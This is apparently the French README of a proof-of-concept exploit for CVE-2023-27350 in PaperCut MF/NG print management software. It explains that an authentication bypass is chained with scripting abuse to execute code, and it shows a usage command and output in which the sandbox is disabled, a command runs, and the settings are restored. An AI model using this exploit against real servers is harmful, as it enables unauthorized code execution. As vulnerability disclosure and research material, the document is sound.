
Vulnérabilité Papercut, les versions concernées sont PaperCut MF ou NG version 8.0 ou ultérieure (à l'exception des versions patchées) sur toutes les plateformes OS.
POC pour CVE-2023-27350 affectant PaperCut MF/NG
##Versions affectées 'PaperCut MF ou NG version 8.0 ou ultérieure (hors versions corrigées) sur toutes les plateformes OS.'
Ce POC utilise une vulnérabilité de contournement d'authentification chaînée avec une utilisation abusive des fonctionnalités de script intégrées pour exécuter du code.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Mettez à jour vers la dernière version ou atténuez en suivant les instructions dans l'avis de sécurité PaperCut
Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de toute utilisation abusive du logiciel. Utilisez-le de manière responsable.